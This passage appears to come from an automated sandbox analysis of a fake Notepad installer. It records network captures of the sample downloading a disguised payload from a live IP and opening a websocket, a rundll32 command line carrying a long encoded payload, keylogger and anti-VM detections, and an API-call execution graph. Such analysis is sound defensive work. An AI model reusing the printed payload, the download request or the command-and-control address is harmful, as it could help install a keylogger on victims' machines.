                                    Jan 13, 2023 05:12:09.898221016 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898268938 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898279905 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898279905 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898315907 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898335934 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898360968 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898375034 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898407936 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898407936 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898453951 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898499966 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898523092 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898523092 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898545980 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898567915 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898591042 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898608923 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898638964 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898648977 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898685932 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898756027 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898756027 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898765087 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898809910 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898835897 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898854971 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898904085 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898907900 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898909092 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898947001 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.898961067 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.898993015 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899036884 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899055004 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899055004 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899082899 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899101019 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899127960 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899132013 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899173021 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899218082 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899234056 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899235010 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899261951 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899321079 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899322987 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899322987 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899363995 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899408102 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899425030 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899425030 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899451971 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899475098 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899497986 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899503946 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899542093 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899554968 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899586916 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899630070 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899646044 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899646044 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899672985 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899698019 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899717093 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899735928 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.899760962 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.899806023 CET8049698164.90.172.224192.168.2.3
                                    • 164.90.172.224
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49698 | 164.90.172.224 | 80 | C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe

Timestamp | kBytes transferred | Direction | Data
Jan 13, 2023 05:12:09.288311005 CET | 110 | OUT | GET /blob/oo6nbv.a50a HTTP/1.1
                                    Host: 164.90.172.224
                                    User-Agent: curl/5.9
                                    Connection: close
                                    X-CSRF-TOKEN: B8U+rHB9TVwXZpzczPGWeTEwduSJwDKoj9JZsKEJuBxyQjZw6jI0zuO5kLJUBJyXQCnlMeG+5ceQHdme90g2Dw==
                                    Cookie: CSRF-TOKEN=B8U+rHB9TVwXZpzczPGWeTEwduSJwDKoj9JZsKEJuBxyQjZw6jI0zuO5kLJUBJyXQCnlMeG+5ceQHdme90g2Dw==; LANG=en-US
Jan 13, 2023 05:12:09.323085070 CET | 112 | IN | HTTP/1.1 200 OK
                                    Content-Length: 929566
                                    Content-Type: image/jpeg
                                    Server: nginx/1.11.13
                                    Date: Fri, 13 Jan 2023 04:12:09 GMT
                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49699 | 164.90.172.224 | 80 | C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe

Timestamp | kBytes transferred | Direction | Data
Jan 13, 2023 05:12:26.301784992 CET | 1084 | OUT | GET /blob/oo6nbv.a50a HTTP/1.1
                                    Host: 164.90.172.224
                                    User-Agent: curl/5.9
                                    Upgrade: websocket
                                    Connection: upgrade
                                    Sec-Websocket-Version: 13
                                    Sec-Websocket-Key: JK0eGt0EctZUUaP
Jan 13, 2023 05:12:26.333707094 CET | 1085 | IN | HTTP/1.1 101 Switching Protocols
                                    Upgrade: websocket
                                    Connection: Upgrade
                                    Sec-WebSocket-Accept: 2Vivv6RVUJckdQYTie0AaD7IW9A=



                                    Target ID:0
                                    Start time:05:11:58
                                    Start date:13/01/2023
                                    Path:C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\Notteppad_SettupX32iX64.exe
                                    Imagebase:0x400000
                                    File size:292381 bytes
                                    MD5 hash:E7DFB892DBD65B0ED6FED69B20EDF739
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.245144448.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.244960679.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000003.243662510.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low

                                    Target ID:1
                                    Start time:05:12:10
                                    Start date:13/01/2023
                                    Path:C:\Windows\System32\rundll32.exe
                                    Wow64 process (32bit):false
                                    Commandline: "C:\Users\user\AppData\Roaming\nsis_uns6283e8.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8DWvAEoAUB8AbyMAZv8AcQBtAHUAQc8ATABOJwAtAVlI|4PsKOgEAgAA|0iDxCjDzMzM|0yJRCQYSIlUfyQQSIlMJAhdAf9Ii0QkMEiJBO0kgQE4SG8ACEjHt0QkEC0B6w6BARCvSIPAAY8BEIEBQNtIOZYAcyWfA4sM|yRIA8hIi8FI64tMqwFUewAD0Uj|i8qKCYgI68F+ZgVlSIsEJWDz8P8zyUiLUBhIO||RdDZIg8IgSP+LAkg7wnQqZv+DeEgYdRpMi|9AUGZBgzhrdN0HERFLdQgREHgQ|y50BUiLAOvV10iLSP0AwWoAQFP|VVZXQVRBVUH3VkFXXQFmgTlN|1pNi|hMi|JI34vZD4X88|BMY|9JPEGBPAlQRd8AAA+F6vPwQYv3hAmI8|CFwEiN3zwBD4TWahGDvLsJjC0BD4TH8|BE|4tnIESLXxyL|3ckRItPGEwD|+FMA9lIA|Ezf8lFhckPhKTz8P9Ni8RBixBFM||SSAPTigKEwP90HUHByg0Pvr3A+gABRAPQvxF1|+xBgfqq|A18|3QOg8EBSYPA|wRBO8lzaevG|4vBD7cMTkWL|yyLTAPrdFgzfe2qEHRRQYsUwQD|0zPJigJMi8Jv6w|BycgRA8jlEO8BQYoA1RDtM8A|M|ZBOwy24BCmAP+DxgGD+Ahy7v|rCkiLy0H|1b9JiQT3g8XkEMS|BDtvGHKvZgFB|19BXkFdQVxf915dWzMXSIHsYP0BZACL6ehm|v9||0iFwA+EmHUg60yNrwGLKxDIM||76Jt9II1fBEyN|0VGM9KLy|9U+yRogCBMi+APhPVrdSBFqBAzwIvTvpEgSIl8JCCmIHB+gCBIi|APhEt1IP6mIFBIjVYIRI2|R0BIjYwkhRFI34vY6Hz9fiCNVtVI3iAQ4iHM8|DoZ37vIESLBo1XCEEgeqYgWMohiYQkgIcS7d7z8IsO2iBYiYyxJHERBzCRIOgx7yCL|ZwtMkyLXTpIg|f7bEiKIDBMiWTfJDhMi6QaMkyJ3VyEAYQk3IcRhpJ2jRGNR0swjCTw8|C|SYvU6On8BTCK3Zx4MkiNhHgyQYD|8yGNT2xEMBj+pAKD6QF184G8|ngyIVJleHVNi3eEJPQiMZQk+DUB|8JIO9hyOIP6f2x2M0SNSUD6AE+UQbgAmACmIEDKIs|4dBlEtjDAMUmN91QkbJEgSYPobLvoa4IwSIvOpiB4|0iF|3QSi1VC+UyOMBsxSI1MJEAf|9dIgcR0IWEkLQgALQE=
                                    Imagebase:0x7ff7f70c0000
                                    File size:69632 bytes
                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000003.269724498.0000025AA3818000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    Target ID:13
                                    Start time:05:12:35
                                    Start date:13/01/2023
                                    Path:C:\Windows\System32\WerFault.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 5152 -s 272
                                    Imagebase:0x7ff679980000
                                    File size:494488 bytes
                                    MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high


                                      Execution Graph

                                      Execution Coverage:10.9%
                                      Dynamic/Decrypted Code Coverage:74.2%
                                      Signature Coverage:13%
                                      Total number of Nodes:1433
                                      Total number of Limit Nodes:76
memset 13899->13900 13901 6f20a5 13899->13901 13904 6f2037 13900->13904 13903 6f20fa GetLastError 13901->13903 13909 6f203b 13901->13909 13905 6f2107 WSAGetLastError 13903->13905 13903->13909 13906 6f206d GetLastError 13904->13906 13904->13909 13907 6f2119 WSAGetLastError 13905->13907 13908 6f2111 WSAGetLastError 13905->13908 13906->13909 13910 6f207e WSAGetLastError 13906->13910 13907->13909 13908->13909 13909->13881 13911 6f208e WSAGetLastError 13910->13911 13912 6f208a WSAGetLastError 13910->13912 13911->13909 13912->13909 13914 6f06ef SetHandleInformation 13913->13914 13915 6f06c7 WSAGetLastError 13913->13915 13918 6f06fe GetLastError 13914->13918 13919 6f073a memset 13914->13919 13916 6f06d7 WSAGetLastError 13915->13916 13917 6f06d3 WSAGetLastError 13915->13917 13937 6f06e3 13916->13937 13917->13937 13921 6f070e GetLastError 13918->13921 13922 6f070a GetLastError 13918->13922 13920 6f0757 13919->13920 13925 6f07a6 GetLastError 13920->13925 13926 6f0787 13920->13926 13923 6f071a 13921->13923 13922->13923 13924 6f0729 closesocket 13923->13924 13924->13937 13925->13926 13927 6f07b3 WSAGetLastError 13925->13927 13931 6f0823 RegisterWaitForSingleObject 13926->13931 13926->13937 13928 6f07bd WSAGetLastError 13927->13928 13929 6f07c5 WSAGetLastError 13927->13929 13930 6f07d5 13928->13930 13929->13930 13933 6f07e1 closesocket 13930->13933 13932 6f083e GetLastError 13931->13932 13931->13937 13934 6f084e GetLastError 13932->13934 13935 6f084a GetLastError 13932->13935 13936 6f07f4 CloseHandle 13933->13936 13933->13937 13934->13937 13935->13937 13936->13937 13937->13891 13939 6f024f 13938->13939 13941 6f031a 13938->13941 13940 6f0263 13939->13940 13939->13941 13942 6f02ad shutdown 13940->13942 13946 6f02a0 13940->13946 13943 6f0336 closesocket 13941->13943 13941->13946 13948 6f0342 13941->13948 13944 6f02c3 WSAGetLastError 13942->13944 13942->13946 13943->13948 13944->13946 13945 6f03c8 13945->13946 13949 6f03de UnregisterWait 13945->13949 13950 6f03e9 13945->13950 
13946->13859 13947 6f03bb ??3@YAXPAX 13947->13945 13948->13945 13948->13947 13952 6f037d UnregisterWait 13948->13952 13953 6f0397 CloseHandle 13948->13953 13954 6f03b9 13948->13954 13949->13950 13950->13946 13951 6f03f0 CloseHandle 13950->13951 13951->13946 13952->13948 13953->13948 13954->13947 13956 6eff5e 13955->13956 13957 6ef86f GetTickCount 13956->13957 13958 6ef7b5 13956->13958 13957->13958 13958->13862 13959->13756 13960->13756 13962 6e6954 VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 13961->13962 13963 6e6951 GetCurrentProcess NtQueryInformationProcess 13961->13963 13962->13963 13963->13761 13965 6e6b97 13964->13965 13966 6e6cb2 VariantInit 13965->13966 13967 6e6bc7 13965->13967 13966->13967 13967->13763 16192 409683 16193 40964e 16192->16193 16194 40965d 16193->16194 16196 408d40 malloc 16193->16196 16195 408d90 65 API calls 16194->16195 16197 409672 16195->16197 16196->16194 16198 409679 16197->16198 16199 40969d strlen 16197->16199 16200 4096b9 16199->16200 16201 4096f7 _strdup 16200->16201 16201->16198 16202 409713 16201->16202 16203 408c90 5 API calls 16202->16203 16203->16198 13439 6e36a1 13442 6e36af 13439->13442 13443 6e36be 13442->13443 13448 6e36db 13443->13448 13458 6e3ca3 _alloca_probe memcpy memset getaddrinfo 13443->13458 13445 6e36ac 13447 6e36d2 13449 6e3721 18 API calls 13447->13449 13448->13445 13451 6e46d3 13448->13451 13449->13445 13466 6e481d malloc memset 13451->13466 13453 6e46eb 13467 6e813a malloc 13453->13467 13455 6e470f 13470 6e488a malloc 13455->13470 13459 6e36cc 13458->13459 13460 6e3d10 13458->13460 13459->13447 13459->13448 13461 6e3d3b memcpy 13460->13461 13462 6e3d83 FreeAddrInfoW 13460->13462 13464 6e3d39 13460->13464 13463 6e3d62 htons 13461->13463 13462->13459 13463->13462 13464->13462 13466->13453 13468 6e816c 13467->13468 13469 6e814a memset 13467->13469 13468->13455 13469->13468 13471 6e489a 13470->13471 13474 6e48d1 13471->13474 13479 6e720e 13474->13479 13478 6e4745 13478->13445 13492 6e7198 malloc 
13479->13492 13481 6e721f 13482 6e726c memcpy 13481->13482 13483 6e7230 13481->13483 13489 6e48eb 13481->13489 13498 6f1717 13482->13498 13484 6e7239 memcpy 13483->13484 13483->13489 13502 6f1759 13484->13502 13487 6e7267 13488 6e72d2 18 API calls 13487->13488 13487->13489 13488->13489 13489->13478 13490 6e491b ??3@YAXPAX 13489->13490 13491 6e4939 13490->13491 13491->13478 13493 6e71b0 13492->13493 13494 6e71b7 ??3@YAXPAX 13493->13494 13495 6e71c3 13493->13495 13494->13481 13506 6e71d3 malloc memset 13495->13506 13497 6e71cf 13497->13481 13499 6f1744 13498->13499 13500 6f1725 13498->13500 13499->13487 13500->13499 13508 6f0a83 13500->13508 13503 6f1767 13502->13503 13505 6f1787 13502->13505 13503->13505 13544 6f0be6 13503->13544 13505->13487 13507 6e71f5 13506->13507 13507->13497 13509 6f0aa4 13508->13509 13518 6f0a9b 13508->13518 13510 6f0abd 13509->13510 13519 6f16a0 13509->13519 13512 6f0af0 memset 13510->13512 13510->13518 13523 6f17f3 13510->13523 13514 6f0b2f 13512->13514 13516 6f0b81 GetLastError 13514->13516 13514->13518 13517 6f0b8e WSAGetLastError 13516->13517 13516->13518 13517->13518 13518->13499 13520 6f16ac 13519->13520 13522 6f16c7 13519->13522 13520->13522 13526 6f042c 13520->13526 13522->13510 13542 6f17bb WSAIoctl 13523->13542 13529 6f0442 13526->13529 13528 6f043e 13528->13522 13530 6f04b9 bind 13529->13530 13531 6f0450 socket 13529->13531 13532 6f04cd WSAGetLastError 13530->13532 13533 6f046a 13530->13533 13534 6f047a SetHandleInformation 13531->13534 13535 6f0464 WSAGetLastError 13531->13535 13532->13533 13533->13528 13536 6f0489 GetLastError 13534->13536 13537 6f04a3 13534->13537 13535->13533 13539 6f0498 13536->13539 13538 6f04ed 12 API calls 13537->13538 13540 6f04b2 13538->13540 13541 6f049a closesocket 13539->13541 13540->13530 13540->13541 13541->13533 13543 6f0ae0 13542->13543 13543->13512 13543->13518 13545 6f0c07 13544->13545 13554 6f0bfe 13544->13554 13549 6f0c21 13545->13549 13555 6f16db 13545->13555 13546 6f0c54 memset 13551 6f0c93 
13546->13551 13548 6f17f3 WSAIoctl 13550 6f0c44 13548->13550 13549->13546 13549->13548 13549->13554 13550->13546 13550->13554 13552 6f0ce5 GetLastError 13551->13552 13551->13554 13553 6f0cf2 WSAGetLastError 13552->13553 13552->13554 13553->13554 13554->13505 13556 6f16e7 13555->13556 13558 6f1703 13555->13558 13556->13558 13559 6f0677 13556->13559 13558->13549 13560 6f0442 19 API calls 13559->13560 13561 6f0689 13560->13561 13561->13558 12733 409ca0 FindNextFileA 12734 409d38 GetLastError 12733->12734 12736 409cc3 12733->12736 12735 409d42 _errno 12734->12735 12734->12736 16308 6e5365 16309 6e52f1 16308->16309 16313 6e5368 16308->16313 16310 6e52fb 16309->16310 16311 6e478a 20 API calls 16309->16311 16312 6e52f9 16311->16312 16314 6e536a 16313->16314 16315 6e53e6 16313->16315 16316 6e5383 16314->16316 16320 6e537e 16314->16320 16321 6e5386 16314->16321 16330 6e642a ??3@YAXPAX 16315->16330 16331 6e6362 5 API calls 16315->16331 16317 6e5446 16318 6e544e 16317->16318 16319 6e5456 16317->16319 16324 6e52e9 20 API calls 16318->16324 16325 6e545a 16319->16325 16326 6e5467 16319->16326 16322 6e478a 20 API calls 16320->16322 16323 6e4a39 12 API calls 16321->16323 16322->16316 16323->16316 16329 6e5454 16324->16329 16328 6e478a 20 API calls 16325->16328 16327 6e4a39 12 API calls 16326->16327 16327->16329 16328->16329 16330->16317 16331->16317 13968 6e497a 13969 6e498a 13968->13969 13970 6e4999 13969->13970 13971 6e49a7 13969->13971 13979 6e4766 13970->13979 13976 6e49b9 13971->13976 13983 6e4d7d 13976->13983 13980 6e477f 13979->13980 13981 6e478a 20 API calls 13980->13981 13982 6e4785 13981->13982 13984 6e4d97 13983->13984 13985 6e4dff 13984->13985 13986 6e4df6 13984->13986 13990 6e4e26 13985->13990 13987 6e478a 20 API calls 13986->13987 13989 6e49b4 13987->13989 14001 6e5602 13990->14001 13992 6e4e52 14013 6e65c6 13992->14013 13996 6e4e9f 14017 6e7344 13996->14017 13998 6e4ed1 13999 6e7434 12 API calls 13998->13999 14000 6e4f04 13999->14000 14000->13989 14002 6e651b 3 API 
calls 14001->14002 14003 6e5630 memcpy memcpy memcpy memcpy 14002->14003 14004 6e568b 14003->14004 14010 6e570a 14003->14010 14005 6e56c9 memcpy memcpy 14004->14005 14007 6e651b 3 API calls 14004->14007 14005->14010 14006 6e57b8 memcpy 14006->13992 14009 6e56b8 memcpy 14007->14009 14008 6e576c memcpy memcpy 14008->14006 14008->14010 14009->14005 14010->14006 14010->14008 14011 6e651b 3 API calls 14010->14011 14012 6e574f memcpy 14011->14012 14012->14010 14014 6e65d2 14013->14014 14015 6e4e80 14013->14015 14014->14015 14016 6e65ed memcmp 14014->14016 14015->13996 14021 6e4d09 _snprintf 14015->14021 14016->14015 14018 6e7353 14017->14018 14023 6e737e _alloca_probe 14018->14023 14022 6e4d42 14021->14022 14022->13996 14025 6e73a5 14023->14025 14027 6f0186 14025->14027 14026 6e7379 14026->13998 14028 6f0195 14027->14028 14029 6f01a4 14027->14029 14028->14026 14029->14028 14032 6f0d4a memset memset 14029->14032 14031 6f01ca 14031->14026 14033 6f0d8b CreateEventA 14032->14033 14034 6f0da1 WSASend 14032->14034 14033->14034 14035 6f0e0d GetLastError 14034->14035 14037 6f0dbe 14034->14037 14036 6f0e1a WSAGetLastError 14035->14036 14035->14037 14042 6f0dc4 14036->14042 14038 6f0e95 RegisterWaitForSingleObject 14037->14038 14037->14042 14039 6f0eb0 GetLastError 14038->14039 14038->14042 14040 6f0ebc GetLastError 14039->14040 14041 6f0ec0 GetLastError 14039->14041 14040->14042 14041->14042 14042->14031 14371 6e4151 ??3@YAXPAX 13064 402503 13065 402529 calloc 13064->13065 13066 402517 13064->13066 13068 402547 13065->13068 13067 40251c 13066->13067 13069 402585 strlen malloc 13066->13069 13070 402576 13066->13070 13068->13067 13072 4025ab 13069->13072 13073 4025ef 13069->13073 13071 408660 free 13070->13071 13071->13067 13075 4025c3 memcpy 13072->13075 13076 401c73 13073->13076 13075->13073 13077 401c81 13076->13077 13078 401c8f 13076->13078 13077->13078 13079 408660 free 13077->13079 13078->13070 13079->13078 13139 6e7329 ??3@YAXPAX 13140 6e733f 13139->13140 13093 6ef509 
SetErrorMode 13112 6f1c63 6 API calls 13093->13112 13095 6ef519 WSAStartup 13113 6f160c memset htons inet_addr 13095->13113 13098 6f187b 13114 6f1653 memset htons 13098->13114 13101 6f18fc WSAGetLastError 13105 6f1908 13101->13105 13102 6f18c4 getsockopt 13103 6f18e9 13102->13103 13104 6f18f3 closesocket 13102->13104 13103->13104 13106 6f1909 socket 13104->13106 13105->13106 13107 6f194e WSAGetLastError 13106->13107 13108 6f191a getsockopt 13106->13108 13111 6f195a 13107->13111 13109 6f193f 13108->13109 13110 6f1945 closesocket 13108->13110 13109->13110 13110->13111 13112->13095 13113->13098 13117 6f27d0 13114->13117 13116 6f168c socket 13116->13101 13116->13102 13118 6f27da 13117->13118 13119 6f27f9 13117->13119 13120 6f27df 13118->13120 13124 6f28d5 memset 13118->13124 13133 6f2808 13119->13133 13120->13116 13123 6f27f7 13123->13116 13128 6f28fe 13124->13128 13125 6f2a19 13125->13123 13126 6f2925 strchr 13127 6f293b strchr 13126->13127 13126->13128 13127->13128 13128->13125 13128->13126 13129 6f2a26 13128->13129 13132 6f29c6 13128->13132 13129->13125 13130 6f2808 2 API calls 13129->13130 13130->13132 13131 6f2a4b memcpy 13131->13125 13132->13125 13132->13131 13135 6f28a7 13133->13135 13136 6f282d 13133->13136 13134 6f2832 strchr 13134->13136 13135->13123 13136->13134 13136->13135 13137 6f28a1 13136->13137 13137->13135 13138 6f28b4 memcpy 13137->13138 13138->13135 13438 6e6305 LoadLibraryA 13562 401330 atexit 14043 6e61d4 14044 6e61e3 14043->14044 14052 6e623b 14044->14052 14053 6e5e73 GetPEB 14044->14053 14046 6e61ed 14046->14052 14055 6e5f12 GetModuleHandleA GetProcAddress 14046->14055 14050 6e6226 SetErrorMode 14062 6e43c5 14050->14062 14054 6e5e92 14053->14054 14054->14046 14056 6e5f39 GetCurrentProcess NtQueryInformationProcess 14055->14056 14057 6e5f70 14055->14057 14058 6e5f52 14056->14058 14061 6e6320 memset memset memset 14057->14061 14058->14057 14059 6e5f60 14058->14059 14072 6e5fa1 GetModuleHandleA GetProcAddress 14059->14072 14061->14050 14064 6e43e9 
14062->14064 14063 6e443e 14063->14052 14064->14063 14092 6e4444 14064->14092 14067 6e4427 14232 6e4211 14067->14232 14068 6e4430 14109 6e2b92 calloc 14068->14109 14073 6e603c 14072->14073 14074 6e5fc9 14072->14074 14073->14057 14074->14073 14076 6e6014 14074->14076 14078 6e0517 memset 14074->14078 14076->14073 14080 6e6085 GetProcAddress 14076->14080 14079 6e0543 14078->14079 14079->14074 14081 6e60fe 14080->14081 14082 6e609d 14080->14082 14081->14073 14082->14081 14087 6e6103 14082->14087 14085 6e60c6 VirtualProtect 14085->14081 14086 6e60e1 InterlockedExchange VirtualProtect 14085->14086 14086->14081 14089 6e6126 14087->14089 14090 6e60b8 14087->14090 14088 6e0517 memset 14088->14089 14089->14088 14089->14090 14091 6e6103 memset 14089->14091 14090->14081 14090->14085 14091->14089 14093 6eca28 memset 14092->14093 14094 6e447b 14093->14094 14095 6ee463 2 API calls 14094->14095 14096 6e448d 14095->14096 14097 6ee4fc 2 API calls 14096->14097 14098 6e449d _snwprintf OpenMutexW 14097->14098 14099 6e450f 14098->14099 14100 6e4509 CloseHandle 14098->14100 14102 6e4516 _snwprintf OpenMutexW 14099->14102 14104 6e457d GetCurrentProcessId ProcessIdToSessionId 14099->14104 14103 6e4416 14100->14103 14102->14099 14102->14100 14103->14063 14103->14067 14103->14068 14105 6e459c 14104->14105 14106 6e463d _snwprintf InitializeSecurityDescriptor SetSecurityDescriptorDacl CreateMutexW GetLastError 14104->14106 14105->14106 14107 6e45a6 _snwprintf InitializeSecurityDescriptor SetSecurityDescriptorDacl CreateMutexW GetLastError 14105->14107 14106->14100 14106->14103 14107->14100 14108 6e4633 14107->14108 14108->14103 14108->14106 14110 6e3598 14109->14110 14111 6e2bb9 14109->14111 14110->14063 14112 6e359d 4 API calls 14111->14112 14113 6e2bcd 14112->14113 14114 6e2cec memset time srand calloc 14113->14114 14117 6e403a 4 API calls 14113->14117 14115 6e2dfb ??3@YAXPAX 14114->14115 14116 6e2d41 14114->14116 14115->14110 14123 6e2e28 GetCurrentProcess OpenProcessToken 14115->14123 
14119 6e2d47 strlen 14116->14119 14118 6e2be3 14117->14118 14118->14114 14122 6e2975 4 API calls 14118->14122 14121 6e8013 7 API calls 14119->14121 14124 6e2d60 14121->14124 14125 6e2bfe 14122->14125 14126 6e2e9d 14123->14126 14127 6e2e42 memset 14123->14127 14128 6e2de3 14124->14128 14131 6ef51e 5 API calls 14124->14131 14125->14114 14132 6e2c82 ??3@YAXPAX 14125->14132 14137 6e2c18 VirtualAlloc 14125->14137 14130 6e359d 4 API calls 14126->14130 14129 6e415d 7 API calls 14127->14129 14135 6e64d1 2 API calls 14128->14135 14133 6e2e70 14129->14133 14134 6e2ea2 14130->14134 14153 6e2d6c 14131->14153 14132->14114 14140 6e2c8f 14132->14140 14138 6e2e77 lstrcmpiW 14133->14138 14139 6e2e94 CloseHandle 14133->14139 14141 6e2eaa 14134->14141 14142 6e2f98 14134->14142 14136 6e2dee ??3@YAXPAX 14135->14136 14136->14115 14137->14132 14144 6e2c30 memcpy 14137->14144 14138->14139 14146 6e2e8d 14138->14146 14139->14126 14140->14114 14143 6e35f2 3 API calls 14141->14143 14145 6ec89b 9 API calls 14142->14145 14147 6e2eb5 14143->14147 14148 6e2c4e memcpy 14144->14148 14149 6e2c79 14144->14149 14150 6e2fa0 14145->14150 14146->14139 14151 6e358e ??3@YAXPAX 14147->14151 14152 6e2ec2 calloc 14147->14152 14148->14148 14148->14149 14149->14132 14154 6e403a 4 API calls 14150->14154 14151->14110 14152->14151 14155 6e2edb memcpy memcpy memcpy strlen 14152->14155 14157 6ef5ba 63 API calls 14153->14157 14159 6e2fab 14154->14159 14156 6e2f6c ??3@YAXPAX 14155->14156 14161 6e358d 14156->14161 14157->14128 14159->14151 14160 6e2975 4 API calls 14159->14160 14162 6e2fd1 14160->14162 14161->14151 14163 6e357a 14162->14163 14164 6e3f27 rand 14162->14164 14165 6e64d1 2 API calls 14163->14165 14166 6e2fe4 